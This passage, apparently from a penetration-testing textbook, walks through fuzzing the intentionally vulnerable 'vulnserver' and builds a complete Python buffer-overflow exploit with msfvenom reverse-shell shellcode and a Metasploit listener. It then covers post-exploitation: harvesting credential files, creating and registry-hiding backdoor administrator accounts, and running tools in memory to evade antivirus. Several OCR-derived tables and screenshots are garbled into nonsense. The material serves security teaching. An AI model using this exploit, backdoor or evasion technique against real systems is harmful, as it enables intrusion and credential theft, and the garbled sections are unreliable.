- Bug 1406744 (CVE-2016-0736) CVE-2016-0736 httpd: Padding Oracle in Apache mod (Redhat)
- Apache httpd 2.4 vulnerabilities (Apache)

The various sections in SecurityFocus can be explained as follows:

- info: This provides information details about the vulnerabilities and the affected platform, along with the bugtrack ID
- discussion: This provides details about the reported vulnerability
- exploit: If there is any public exploit code written, it will be available for download
- solution: This provides the latest service pack details and the hotfix details
- references: This includes all the discussions, bugtrack references, and solution references to the reported vulnerability

Compiling and using exploits

Attackers will collate all of the relevant exploits, publish and compile them, and make them ready to use as a weapon to exploit the target. In this section, we will take a deep dive into compiling different types of files and also add all the exploits written in Ruby that has <code>msfcore</code> as the base to Metasploit modules.

Compiling C files

Older versions of exploits are written in C language, especially the buffer overflow attacks. Let's look at an example of compiling a C file from the EDB and make an exploit for a vulnerable Apache server.

Attackers can utilize GNU compiler collection to compile a C file into an executable; the following commands are involved:

```
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/3996.c apache.c
root@kali:~# gcc apache.c -o apache
root@kali:~# ./apache
```

Once the file is compiled without any error or warning, attackers should be able to see the exploit running as shown in the following screenshot:



Adding the exploits that are written using the MSF as a base

Copy the exploit file/script either from exploit-db.com directly from the browser or from /usr/share/exploitdb/exploits/, depending on the platform and the type of the exploit you are running.

In this example, we will use /usr/share/exploitdb/exploits/windows/remote/16756.rb.

Add the ruby script as custom exploit to the Metasploit module, move the file to /usr/share/metasploit-framework/modules/exploits/windows/http/, and name the file as NewExploit.rb:

root8kali:-# cp /usr/share/exploitdb/exploits/windows/remote/16756.rb NewExploit.rb root8kall:~# mv NewExploit.rb /usr/share/metasploit-framework/modules/exploits/windows/http/

Once the file has been moved to its new location, you must restart <code>msfconsole</code> just to ensure that the file has been loaded into the available module in Metasploit. You will be able to search the module with your custom name that you set as part of the available Metasploit module:

| mif > search Mewsxploit | | | | |
|---------------------------------|-----------------|-----------|-------|---|
| Matching Modules | | | | |
| Nome | Disclosure Date | Battik :: | Check | Description |
| | | | | |
| exploit/windows/http/NewExploit | 2003-06-21 | normal | Yen | Sambar 6 Search Results Buffer Overflow |

Developing a Windows exploit

Attackers must have a fair bit of understanding about the assembly language to develop custom exploits. In this section, we will cover some basics that are required to develop a Windows exploit by building a vulnerable application.

From the exploit development perspective, the following are the basic terms that penetration testers must understand for when they develop an exploit:

- **Registers**: All of the processes execute via registers; these are used to store information.
- **x86**: This includes 32-bit systems that are mostly Intel-based; 64-bit systems are represented as x64.
- Assembly language: This includes a low-level programming language.
- **Buffer**: This is a static memory holder in a program that stores data on top of the stack or heap.
- **Debugger**: Debuggers are the programs that can be utilized so that you can see the runtime of a program while executing. You can also use them to look at the state of registry and memory. Some of the tools that we will be using are immunity debuggers, GDB, and ollydbg.
- **ShellCode**: This is the code that is created by the attackers in a successful exploitation.

The following are the different types of registers:

- EAX: This is a 32-bit register that is used as an accumulator and stores data and operands
- **EBX**: This is a 32-bit base register and acts as a pointer to the data
- **ECX**: This is a 32-bit register that's used for looping purposes
- **EDX**: This is a 32-bit data register that stores I/O pointers
- **ESI/EDI**: These are 32-bit index registers that act as data pointers for all the memory operations
- **EBP**: This is a 32-bit stack data pointer register
- Extended Instruction Pointer (EIP): This is a 32-bit program counter/instruction pointer that holds the next instruction to be executed
- Extended Stack Pointer (ESP): This is a 32-bit stack pointer register that

points exactly to where the stack is pointing

- SS, DS, ES, CS, FS, and GS: These are 16-bit segment registers
 NOP: This stands for no operations
- **JMP**: This stands for jump instructions

Identifying a vulnerability using fuzzing

Attackers must be able to identify the right fuzzing parameters in any given application to find a vulnerability and then exploit it. In this section, we will look at an example of **vulnerable server**, which was created by Stephen Bradshaw.

This vulnerable software can be downloaded from https://github.com/PacktPublishin g/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Third-Edition/blob/master/Chapter% 2010/vulnserver.zip.

In this example, we will be using Windows 7 as the victim running vulnerable server.

Once the application is downloaded, we will be unzipping the file and running the server. This should open up TCP port 9999 for the remote clients to connect to. When the vulnerable server is up and running, you should be able to see the following:



Attackers can connect to the server on port 9999, using netcat to communicate to the server, as shown in the following screenshot:

```
coot@kali:~# nc -vv 192.168.0.119 9999
192.168.0.119: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.119] 9999 (?) open
Welcome to Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
STATS [stat value]
RTIME [rtime value]
LTIME [ltime value]
SRUN [srun value]
TRUN [trun value]
GMON [qmon value]
GDOG [qdoq value]
KSTET [kstet value]
GTER [gter value]
HTER [hter value]
LTER [lter value]
KSTAN [1stan value]
EXIT
```

Fuzzing is a technique in which attackers specifically send malformed packets to the target to generate errors in the application or create general failures. These failures create bugs in the application and find out how it can be exploited to allow remote access by running their own code. Now that the application is accessible and everything is set, attackers can now begin the art of fuzzing.

Although there are a number of fuzzing tools available, SPIKE is the default that was installed on Kali Linux version 2.0. SPIKE is a fuzzing toolkit that's used to create fuzzers by providing scripting capabilities; however, it is written in the C language. The following is a list of interpreters written in SPIKE that can be utilized:

- generic_chunked
- generic_send_tcp
- generic_send_udp
- generic_web_server_fuzz
- generic_web_server_fuzz2
- generic_listen_tcp

SPIKE allows you to add your own set of scripts without having to write a few

hundred lines of code in C.

Attackers with access to the application can see multiple options available in the vulnerable server, which they can then play with. This includes stats, RTIME, LTIME, SRUN, TRUN, GMON, GDOG, KSTET, GTER, HTER, LTER, and KSTAN as part of valid commands that take input. We will utilize the generic_send_tcp interpreter to fuzz the application. The format to use the interpreter is as follows: . /generic_send_tcp host port spike_script SKIPVAR SKIPSTR:

- host: This is the target host or IP
- port: This is the port number to be connected to
- spike_script: This is the SPIKE script to run on the interpreter
- SKIPVAR and SKIPSTR: This allows the testers to jump into the middle of the fuzzing session, as defined in the SPIKE script

Let's go ahead and create a simple SPIKE script for readline, run SRUN, and assign a string value as the parameter:

```
s_readline();
s_string("SRUN |");
s_string_variable("VALUE");
```

The preceding three lines read the first line after connecting to the IP/hostname and then run SRUN, along with a randomly generated value. Now let's save the file as exploitfuzzer.spk and run the SPIKE script against the target, as shown in the following screenshot:

```
root@kali:~# generic_send_tcp 192.168.0.119 9999 exploitfuzz.spk 0 0
Total Number of Strings is 681
Fuzzing
Fuzzing Variable 0:0
line read=Welcome to Vulnerable Server! Enter HELP for help.
Fuzzing Variable 0:1
line read=Welcome to Vulnerable Server! Enter HELP for help.
Variablesize= 5004
Fuzzing Variable 0:2
line read=Welcome to Vulnerable Server! Enter HELP for help.
Variablesize= 5005
Fuzzing Variable 0:3
line read=Welcome to Vulnerable Server! Enter HELP for help.
Variablesize= 21
```
Fuzzing confirmed no server crash or anything similar, so the SRUN parameter is not vulnerable. The next step is to pick another one. This time, we will pick TRUN as the parameter to fuzz:

```
s_readline();
s_string("TRUN |");
s_string_variable("VALUE");
```

Save the exploitfuzz.spk file and run the same command, as shown in the following screenshot:

```
root@kali: # generic_send_tcp 192.168.0.119 9999 exploitfuzz.spk 0 0
Total Number of Strings is 681
Fuzzing
Fuzzing Variable 0:0
line read=Welcome to Vulnerable Server! Enter HELP for help.
Fuzzing Variable 0:1
line read=Welcome to Vulnerable Server! Enter HELP for help.
Variablesize= 5004
Fuzzing Variable 0:2
Variablesize= 5005
Fuzzing Variable 0:3
Variablesize= 21
Fuzzing Variable 0:4
Variablesize= 3
Fuzzing Variable 0:5
```

You should now be able to see that the server crashed on the victim's PC. Windows also gives us some useful information on exception offset 41414141 that we can take note of (which is converted as AAAA), as shown in the following screenshot:



Now that we know that the vulnerable TRUN command created the crash, we must now focus on the request that caused it. This can be achieved by running Wireshark, which will provide us the exact request that caused the crash of the server:

- 1. Run the Wireshark with the right Ethernet adapter.
- 2. Repeat the exploit using the fuzzer (generic_send_tcp target port exploitfuzz.spk 0 0).
- 3. Filter the Wireshark with the tcp.port == 9999 filter.
- 4. Right-click on the packet and follow the TCP stream. You should be able to see the following:

| Sta Edt Yow En Detan A | andres Santalas Teleptony Womana Jacob Berg 10 O. • • J. • • III 10 10 10 10 |
|---|--|
| I toporeway of 1 | |
| No. Time Source 10 1 000000000000000000000000000000000 | Wirdunk -falen TCP Brean (ppstream og 11 - winsbak, ettil, 201396022038), (AGCH) willcome to (uthermable Server) Enter HELP for help. 75/8 (77 |
| Frame 23: 5005 bytes on Ethernet Framework (Market Framework) Transmission Control Free Data: 10010 hytes) Data: 9422544-207-2120 (Length: 9210) | |

Now let's go ahead and write a simple Python program to crash the server. This will be a simple socket program to connect to the IP and run the command with a buffer of "z" * 10000. The following code extract provides the first step in fuzzing and debugging an application vulnerability:

```
import socket
IP = raw_input("enter the IP to crash:")
PORT = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
banner = s.recv(1024)
print(banner)
command = "TRUN "
header = "|/.:/"
buffer = "Z" * 10000
s.send (command + header + buffer)
print ("server dead")
```

Save the file as crash.py and run it against the target IP. You will see server dead with 10000 as the buffer. This means that having "z" * 10000 as input crashed the server, as shown in the following screenshot:

```
root@kali:~# python crash.py
enter the IP to crash:192.168.0.119
Welcome to Vulnerable Server! Enter HELP for help.
server dead
```

Now, the next step is to identify exactly how many characters caused the server crash and what buffer size can be utilized. On the server side, we must debug the

application. To perform the debugging, we will download the immunity debugger from https://www.immunityinc.com/products/debugger/. These debuggers are used mostly in finding exploits, analyzing malware, and reverse engineering any binary files.

Focusing on the vulnerable server, let's load vulnerableserver.exe into Immunity Debugger and run the application, as shown in the following screenshot:



The next step is to create a pattern using the MSF by locating to

the /usr/share/metasploit-framework/tools/exploit/ folder and running ./pattern_create - 1 4000 in the Terminal, as shown in the following screenshot:



You can either output the contents that's generated into a file or copy it from the

terminal. Alternatively, you can add to your Python program by adding another variable. This time, we will disable the buffer and use the pattern that was created by exploit tool with a length of 4000:

```
import socket
IP = raw_input("enter the IP to crash:")
PORT = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
banner = s.recv(1024)
print(banner)
command = "TRUN "
header = "|/.:/"
#buffer = "Z" * 10000
pattern = <value>
s.send (command + header + pattern)
print ("server dead")
```

Again, running crash.py against the target will result in the server crashing again. However, all of the z characters are being replaced by the pattern that was created. On the vulnerable server, we should be able to see the registers from our Immunity Debugger, which provides the next instruction that will be stored in EIP, as shown in the following screenshot:

| | | | | | | | | | | | | | - | | | |
|--|--|---|--|--|--|----------------|------------|--------------|------------|----------------|----------------|-------|----------------|------------------|------------------|------------|
| Reg | isters (| FPU) | | | | | | < | | 3 | < | < | < | 3 | < | |
| EAX EDX EBX ESP ESP ESI EDI | 0225F20 006659D 0000000 0000007 0225F9E 43366F4 0000000 0000000 | Ø ASCI C Ø ASCI Ø Ø | : "TRI | UN ¦∕. ⊳9Cp0C | :∕Aa p1Cp | 0Aa 2Cp | 1Aa 3Cp | 2Aa: 4Cp! | 3Aa 5Cp | 4Aa5f 6Cp7(| Ра6Аа Ср8Ср | 9Cq00 | la9Ab Cq1Cq | 0АЬ1АЮ 2Сq3С(| 62A63F q4Cq5(| 964 Cq6 |
| EIP | 6F43376 | F | | | | | | | | | | | | | | |
| 01010000 | ES 0021 CS 0022 SS 0021 DS 0021 FS 005 GS 0021 | B 32511 3 32511 8 32511 8 32511 8 32511 8 32511 8 32511 | 0(FF 0(FF 0(FF 0(FF 7EFI 0(FF | FFFFFF FFFFFF FFFFFF FFFFFF DA000(FFFFFF FFFFFF | F) F) F) F) FFF) F) 0000 | 999 | ดา | | | | | | | | | |
| FFI | 0001024 | 6 (NO.1 | B.F.F | BE.NS. | PE.G | 666 F.I | F) | | | | | | | | | |
| STØ ST1 ST2 ST3 ST4 ST5 ST6 ST7 | empty g empty g empty g empty g empty g empty g empty g empty g | | | | | D 1 | | 7 5 | - Cr | | | | | | | |
| FST FCW | 0000 C | ond 0 (rec NEA | 0 0 0 AR,53 | Err Mask | E S 0 0 | PU 00 11 | 0 1 | 0 0 1 1 | 0 1 | (GT) | | | | | | |

That's the end of fuzzing. In the next section, we will focus on creating a Windows-specific exploit.

Creating a Windows-specific exploit

To create a Windows-specific exploit, we must identify the right offset of the EIP. This can be extracted by exploit tools such as patter_offset, which takes the input of the EIP with the same length that was used to create the pattern:

```
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb -q 0x6F4337
[*] Exact match at offset 2002
```

This means that an offset match was found in the pattern that was created with the EIP. Now, we know that buffer 2002 is enough to crash the server, and we can begin the overflow.

The next step is to find what EIP register stores the opcodes for the JMP ESP assembly. In the Immunity Debugger, view the executable modules and select essfunc.dll, as shown in the following screenshot:

| E Execu | E Executable modules | | | | | | | | | |
|--|--|--|---|---|--|--|--|--|--|--|
| Base | Size | Entry | Name | File version | Path | | | | | |
| 00400000 02B20000 10000000 40160000 41AC0000 62500000 | 00007000 00019000 00000000 00006000 00035000 00035000 | 00401130 02B24975 100010E1 40161782 41AC145D 625010C0 | vulnserv sechost CRYPTBAS NSI WS2_32 essfunc | 6.1.7600.16385 6.1.7601.18912 6.1.7600.16385 6.1.7600.16385 6.1.7600.16385 | C:\Users\EISC\Downloads\vulnserver\vulnserver.exe C:\Windows\SysWOW64\sechost.dll C:\Windows\syswow64\CRYPTBASE.dll C:\Windows\syswow64\NSI.dll C:\Windows\syswow64\WS2_32.DLL C:\Users\EISC\Downloads\vulnserver\essfunc.dll | | | | | |
| 60980000 6F850000 6FF50000 78990600 77060000 | 8003C000 9009D000 900AC000 900C000 900C000 900A1000 | 6C881450 6F91405A 6FF5A472 70991688 77074940 | mswsook USP10 msvort MSCTF ADVAP132 | 6.1.7600.16385 1.0626.7601.184 7.0.7601.17744 6.1.7600.16385 6.1.7601.18869 | C:\Windows\system32\mswsock.dll C:\Windows\syswow64\USP10.dll C:\Windows\syswow64\msvcrt.dll C:\Windows\syswow64\MSCTF.dll C:\Windows\syswow64\ABVAPI32.dll | | | | | |
| 7D850000 7D850000 7D8A0000 7D910000 7D910000 | 00047000 00060000 00060000 00060000 | 708574C1 7086A383 7092158F 70926338 | KERNELBA SspiCli IMM32 60132 | 6.1.7601.18015 6.1.7601.18912 6.1.7601.12514 6.1.7601.12514 | C:\Windows\syswow64\KERNELBASE.dll C:\Windows\syswow64\SspiCli.dll C:\Windows\syswow64\SspiCli.dll C:\Windows\system32\IMM32.BLL C:\Windows\system32\IMM32.dll | | | | | |
| 7DB50000 7DC50000 7DD60000 7DE70000 | 000F0000 00100000 00110000 00180000 | 70860569 700686ED 70073283 | RPCRT4 user82 kerne132 ntdll | 6.1.7600.16385 6.1.7601.17514 6.1.7601.18015 6.1.7600.16385 | C:\Windows\syswow64\RPCRT4.dll C:\Windows\syswow64\user32.dll C:\Windows\syswow64\kernel32.dll C:\Windows\SysWOW64\ntdll.dll | | | | | |

Right-click and search for the command and type in jmp esp. We should be able to see the CPU thread of the first JMP ESP register. Copy the address, that is, 625011AF FFE4 JMP ESP:

| C CPU - t | hread 00: | 001AD8, module essfunc |
|--|--|--|
| 6250110F 62501183 62501183 62501183 62501185 62501185 62501186 62501188 62501188 62501188 62501188 62501188 62501188 62501188 | FFE4 FFE0 58 58 50 50 50 55 59 55 59 55 59 55 58 55 58 55 55 55 55 55 55 55 55 55 | POP EAX POP EAX POP EAX RETN POP EBP POP EBP MOV EBP, ESP JMP ECX POP EBX POP EBX |

625011AF is the location where the opcodes for the assembly are stored. The next step is to convert the address to the shell code, which would be $xAF\x11\x50\x62$.

Create a Windows payload using *msfvenom* by running the following command in the Terminal. This will provide a Meterpreter reverse shell on the attacker's IP:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.13

Finally, we are in the last stage of creating the full-fledged exploit—we just need to add a NOP sled and then overflow the buffer and write our shell code to the system running the vulnerable server. The following code extract is the full Python code for exploiting the vulnerable server:

```
import socket
IP = raw_input("enter the IP to hack")
PORT = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
banner = s.recv(1024)
print(banner)
command = "TRUN "
header = "|/.:/"
buffer = "Z" * 2002
#625011AF FFE4 JMP ESP
eip = "\xAF\x11\x50\x62"
nops = "\x90" * 50
buf = ""
```

| buf | += | "\xd9\xc0\xd9\x74\x24\xf4\x5d\xb8\x8b\x16\x93\x5e\x2b" |
|------|------|--|
| buf | += | "\xc9\xb1\x61\x83\xed\xfc\x31\x45\x16\x03\x45\x16\xe2" |
| buf | += | "\x7e\xcf\x53\x87\xf4\xd4\xa7\x62\x4b\xfe\x93\x1a\xda" |
| buf | += | "\xd4\xea\xac\x47\x1a\x97\xd9\xf4\xb6\x9b\xe5\x6a\x8e" |
| buf | += | "\x0f\x76\x34\x24\x05\x1c\xb1\x08\xbe\xdd\x30\x77\x68" |
| buf | += | "\xbe\xf8\x2e\x89\xc9\x61\x6c\x50\xf8\xa9\xef\x7d\xbd" |
| buf | += | "\xd2\x51\x11\x59\x4e\x47\x07\xf9\x83\x38\x22\x94\xe6" |
| buf | += | "\x4d\xb5\x87\xc7\x54\xb6\x85\xa6\x5d\x3c\x0e\xe0\x1d" |
| buf | += | "\x28\xbb\xac\x65\x5b\xd5\x83\xab\x6b\xf3\xe7\x4a\xc4" |
| buf | += | "\x65\xdf\x76\x52\xf2\x18\xe7\xf1\xf3\xb5\x6b\x02\xfe" |
| buf | += | "\x43\xff\xc7\x4b\x76\x68\x3e\x5d\xc4\x17\x91\x66\x08" |
| buf | += | "\x21\xd8\x52\x77\x99\x59\xa9\x74\xba\xea\xfd\x0f\xfb" |
| buf | += | "\x11\xf3\x29\x70\x2d\x3f\x0d\xbb\x5c\xe9\x13\x5f\x64" |
| buf | += | "\x35\x20\xd1\x6b\xc4\x41\xde\x53\xeb\x34\xec\xf8\x07" |
| buf | += | "\xac\xe1\x43\xbc\x47\x1f\x6a\x46\x57\x33\x04\xb0\xda" |
| buf | += | "\xe3\x5d\xf0\x67\x90\x40\x14\x9b\x73\x98\x50\xa4\x19" |
| buf | += | "\x80\xe0\x4b\xb4\xbc\xdd\xac\xaa\x92\x2b\x07\xa6\x3d" |
| buf | += | "\xd2\x0c\xdd\xf9\x99\xb9\xdb\x93\x1e\x20\x89\x57" |
| buf | += | "\x7c\x1e\xfe\x45\x50\x2a\x1a\x79\x8c\xbf\xdb\x76\xb5" |
| buf | += | "\xf5\x98\x6c\x06\xed\xa8\xdb\x9f\x67\x67\x56\x25\xe7" |
| buf | += | "\xcd\xa2\xa1\x0f\xb6\xc9\x3f\x4b\x67\x98\x1f\xe3\xdc" |
| buf | += | "\x6f\xc5\xe2\x21\x3d\xcd\x23\xcb\x5f\xe9\x30\xf7\xf1" |
| buf | += | "\x2d\x36\x0c\x19\x58\x6e\xa3\xff\x4e\x2b\x52\xea\xe7" |
| buf | += | "\x42\xcb\x21\x3d\xe0\x78\x07\xca\x92\xe0\xbb\x84\xa1" |
| buf | += | "\x61\xf4\xfb\xbc\xdc\xc8\x56\x63\x12\xf8\xb5\x1b\xdc" |
| buf | += | "\x1e\xda\xfb\x12\xbe\xc1\x56\x5b\xf9\xfc\xfb\x1a\xc0" |
| buf | += | "\x73\x65\x54\x6e\xd1\x13\x06\xd9\xcc\xfb\x53\x99\x79" |
| buf | += | "\xda\x05\x34\xd2\x50\x5a\xd0\x78\x4a\x0d\x6e\x5b\x66" |
| buf | += | "\xbb\x07\x95\x0b\x03\x32\x4c\x23\x57\xce\xb1\x1f\x2a" |
| buf | += | "\xe1\xe3\xc7\x08\x0c\x5c\xfa\x02\x63\x37\xb9\x5a\xd1" |
| buf | += | "\xfe\xa9\x05\xe3\xfe\x88\xcf\x3d\xda\xf6\xf0\x90\x6b" |
| buf | += | "\x3c\x8b\x39\x3e\xb3\x66\x79\xb3\xd5\x8e\x71" |
| s.se | end | (command + header + buffer + eip + nops + buf) |
| prin | nt (| "server pawned - enjoy the shell") |

Once the exploit is completed, ensure that your listener is running, as shown in the following screenshot:

```
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.0.137
lhost => 192.168.0.137
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.137:4444
[*] Starting the payload handler...
```

Everything is now set. Attackers will now be able to perform and craft a

Windows-specific exploit using Python programming. The next step is to run crash.py from the Terminal:

root@kali:~# python crash.py
enter the IP to hack:192.168.0.119
Welcome to Vulnerable Server! Enter HELP for help.
Server pawned - enjoy the shell

The successful exploitation has overwritten the buffer with our shell code and pawned a reverse shell to the attacker, as shown in the following screenshot:



Server username: victim\EISC

Summary

In this chapter, we focused on the fundamentals of exploitation and the different tools that convert findings from reconnaissance into a defined action that establishes the right connection between the tester and the target.

Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal Exploit-DB as well as several frameworks that simplify the use and management of these exploits. We took a deep dive into the MSF, using Armitage to manage multiple shells, and also learned how to compile different types of files from Exploit-DB into a real exploit.

We also focused on how to develop Windows exploits by identifying different fuzzing techniques. We also loaded the shell code into the custom exploits.

In the next chapter (chapter 11, Action on the Objective and Lateral Movement), we will learn about the most important part of the attacker's kill chain as well as post-exploitation, privilege escalation, lateral movement in the network, compromising the domain trusts, and port forwarding.

Action on the Objective and Lateral Movement

If exploiting a system is the definition of what a penetration test is, it is the action on the objective after the exploitation that gives the test its real purpose. This step demonstrates the severity of the exploit, and the impact that it could have on the organization. This chapter will focus on the immediate post-exploit activities, as well as the aspect of horizontal escalation—the process of using an exploited system as a starting point to jump off to other systems on the network.

By the end of this chapter, you will have learned about the following topics:

- Local privilege escalation
- Post-exploitation tools
- Lateral movement within the target networks
- Compromising domain trusts
- Pivoting and port forwarding

Activities on the compromised local system

It is usually possible to get guest or user access to a system. Frequently, the attacker's ability to access important information will be limited by reduced privilege levels. Therefore, a common post-exploitation activity is to escalate access privileges from guest to user to administrator and, finally, to SYSTEM. This upward progression of gaining access privileges is usually referred to as **vertical escalation**.

The user can implement several methods to gain advanced access credentials, including the following:

- Employ a network sniffer and/or keylogger to capture transmitted user credentials (dsniff is designed to extract passwords from live transmissions or a PCAP file that has been saved from a Wireshark or tshark session).
- Perform a search for locally stored passwords. Some users collect passwords in an email folder (frequently called passwords). Since password reuse and simple password construction systems are common, the passwords that are found can be employed during the escalation process.
- NirSoft (www.nirsoft.net) produces several free tools that can be uploaded to the compromised system by using Meterpreter to extract passwords from the operating system and applications that cache passwords (mail, remote access software, FTP, and web browsers).
- Dump the SAM and SYSKEY files using Meterpreter.
- When some applications load, they read **dynamic link library** (**DLL**) files in a particular order. It is possible to create a fake DLL with the same name as a legitimate DLL, place it in a specific directory location, and have the application load and execute it, resulting in elevated privileges for the attacker.
- Apply an exploit that uses a buffer overflow or other means to escalate privileges.
- Execute the getsystem script, which will automatically escalate administrator privileges to the SYSTEM level, from the Meterpreter prompt.

Conducting rapid reconnaissance of a compromised system

Once a system has been compromised, the attacker needs to gain critical information about that system, its network environment, users, and user accounts. Usually, they will enter a series of commands or a script that invokes these commands from the shell prompt.

If the compromised system is based on the Unix platform, typical local reconnaissance commands will include the following:

| Command | Description |
|---|--|
| /etc/resolv.conf | Uses the copy command to access and review the system's current DNS settings. Because it is a global file with read privileges, it will not trigger alarms when accessed. |
| /etc/passwd and /etc/shadow | These are system files that contain username and password hashes. It can be copied by a person with root-level access, and the passwords can be broken using a tool such as John the Ripper. |
| whoami and who - a | Identifies the users on a local system. |
| ifconfig -a, iptables -L -n, and netstat -r | Provides networking information. ifconfig -a provides IP addressing details, iptables -L -n lists all of the rules held in the local firewall (if present), and netstat -r displays the routing information maintained by the kernel. |

| uname -a | Prints the kernel version. |
|--|--|
| ps aux | Prints the currently running services, the process ID, and additional information. |
| dpkg -l yum list grep installed and dpkg -l rpm -qalast head | Identifies the installed software packages. |

These commands contain a brief synopsis of the options that are available. Refer to the appropriate command's help file for complete information on how it can be used.

For a Windows system, the following commands will be entered:

| Command | Description |
|--|---|
| whoami /all | Lists the current user, SID, user privileges, and groups. |
| ipconfig /all and ipconfig /displaydns | Displays information regarding the network interface, connectivity protocols, and local DNS cache. |
| netstat -bnao and netstat - r | Lists the ports and connections with the corresponding processes (-b) to no lookups (-n), all connections (-a), and parent process IDs (-o). The -r option displays the routing |

| | table. They require administrator rights to run. |
|---|---|
| net view and net view ⁄domain | Queries NBNS/SMB to locate all of the hosts in the current workgroup or domain. All of the domains that are available to the host are given by /domain . |
| net user /domain | Lists all of the users in the defined domain. |
| net user %username% /domain | Obtains information on the current user if they are part of the queried domain (if you are a local user, then /domain is not required). It includes the login times, the last time that the password was changed, the logon scripts, and the group memberships. |
| net accounts | Prints the password policy for the local system. To print the password policy for the domain, use net accounts /domain. |
| net localgroup administrators | Prints the members of the administrator's local group. Use the /domain switch to obtain the administrators for the current domain. |
| net group "Domain Controllers" /domain | Prints out a list of domain controllers for the current domain. |
| net share | Displays the current shared folders, which may not provide sufficient access controls for the data shared within the folders, and the paths that they point to. |

Finding and taking sensitive data – pillaging the target

The term **pillaging** (sometimes known as **pilfering**) is a holdover from the days when hackers who had successfully compromised a system saw themselves as pirates, racing to their target to steal or damage as much data as possible. These terms have survived as a reference to the much more careful practice of stealing or modifying proprietary or financial data when the objective of the exploit has been achieved.

The attacker can then focus on the secondary target—system files that will provide information to support additional attacks. The choice of the secondary files will depend on the operating system of the target. For example, if the compromised system is Unix, then the attacker will also target the following:

- The system and configuration files (usually in the /etc directory, but depending on the implementation, they may be in /usr/local/etc or other locations)
- The password files (/etc/password and /etc/shadow)
- The configuration files and public/private keys in the .ssh directory
- The public and private key rings that may be contained in the .gnupg directory
- The email and data files

In a Windows system, the attacker will target the following:

- The system memory, which can be used to extract passwords, encryption keys, and so on
- The system registry files
- The Security Accounts Manager (SAM) database, which contains hashed versions of the password, or alternative versions of the SAM database, which may be found in %systemRoot%\repair\sam and %systemRoot%\system32\config\RegBack\SAM
- Any other password or seed files that are used for encryption
- The email and data files



Don't forget to review any folders that contain temporary items, such as attachments. For example, UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\ may contain files, images, and cookies that may be of interest.

As stated previously, the system memory contains a significant amount of information for any attacker. Therefore, it is usually a priority file that you need to obtain. The system memory can be downloaded as a single image file from several sources, as follows:

- By uploading a tool to the compromised system and then directly copying the memory (these tools include **Belkasoft RAM capturer**, **Mandiant Memoryze**, and **MonsolsDumpIt**).
- By copying the Windows hibernation file, hiberfil.sys, and then using Volatility to decrypt and analyze the file. Volatility, which can be found on Kali in the Forensics menu, is a framework that was written to analyze memory dumps from the system RAM and other files containing system memory. It relies on plugins written in Python to analyze the memory and extract data such as encryption keys, passwords, registry information, processes, and connectivity information.
- By copying a virtual machine and converting the VMEM file to a memory file.

If you upload a program that's designed to capture memory onto a compromised system, it is possible that this particular application will be identified as malicious software by antivirus software. Most antivirus software applications recognize the hash signature and behavior of memory acquisition software, and act to protect the sensitive contents of the physical memory by raising an alarm if it is at risk of disclosure. The acquisition software will be quarantined, and the target will receive a warning, alerting them of the attack.



To avoid this, use Metasploit Framework to run the executable completely in the target's memory using the following command: meterpreter> execute -H -m -d calc.exe -f <memory executable + parameters> The previous command executes calc.exe as a dummy executable, but uploads the memory acquisition executable to run in its process space instead.

The executable doesn't show up in process lists, such as Task Manager, and detection using data forensic techniques is much harder because it's not written to disk. Furthermore, it will avoid the system's antivirus software, which generally does not scan the memory space in search of malware.

Once the physical memory has been downloaded, it can be analyzed using the Volatility framework, which is a collection of Python scripts that are designed to forensically analyze memory. If the operating system is supported, Volatility will scan the memory file and extract the following:

- The image information and system data that is sufficient for *tying* the image to its source system.
- The running processes, loaded DLLs, threads, sockets, connections, and modules.
- The open network sockets and connections, and recently opened network connections.
- The memory address, including physical and virtual memory mapping.
- The LM/NTLM hashes and LSA secrets. LanMan (LM) password hashes are Microsoft's original attempt at protecting passwords. Over the years, it has become simple to break them and convert the hashes back into an actual password. NT LanMan (NTLM) hashes are more recent and resilient to attack. However, they are usually stored with the NTLM versions for the purpose of backward compatibility. Local Security Authority (LSA) stores secrets that are local passwords: remote access (wired or wireless), VPN, autologon passwords, and so on. Any passwords that are stored on the system are vulnerable, especially if the user reuses passwords.
- Specific regular expressions or strings stored in memory.

Creating additional accounts

The following commands are highly invasive and are usually detected by the system owner during the incident response process. However, they are frequently planted by an attacker to draw attention away from more persistent access mechanisms. Refer to the following table:

| Command | Description |
|---|---|
| net user attacker password /add net user testuser testpassword /ADD /DOMAIN | Creates a new local account with a user called attacker and a password set to password. It also adds the same user to the domain if you are running the command on a domain controller. |
| net localgroup administrators attacker /add | Adds a new user called attacker to the local administrator's group. In some cases, the command will be net localgroup administrators /add attacker. |
| net user username /active:yes /domain | Changes an inactive or disabled account to active. In a small organization, this will attract attention. Large enterprises with poor password management can have 30% of their passwords flagged as inactive, so it may be an effective way to gain an account. |
| net share name\$=C:\ /grant:attacker,FULL /unlimited | Shares c: (or another specified drive) as a Windows share, and grants the user (attacker) full rights to access or modify all of the content on that drive. |

If you create a new user account, it will be noticed when anyone logs onto the welcome screen of the compromised system. To make the account invisible, you need to modify the registry from the command line using the following $_{\text{REG}}$ command:

|REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon\Special&

This will modify the designated registry key to hide the account of the user (/v). Again, there may be special syntax requirements based on the specific version of the target's operating system, so determine the Windows version first and then validate it in a controlled test environment before implementing it against the target.

Post-exploitation tools

Post-exploitation is the real art of using the existing level of access to escalate, exploit, and exfiltrate. In the following sections, we will explore three different post exploitation tools: Metasploit, Empire, and CrackMapExec.

The Metasploit Framework

Metasploit was developed to support both exploit and post-exploit activities. The present version contains approximately 183 Windows modules that simplify post-exploit activities. We will review some of the most important modules here.

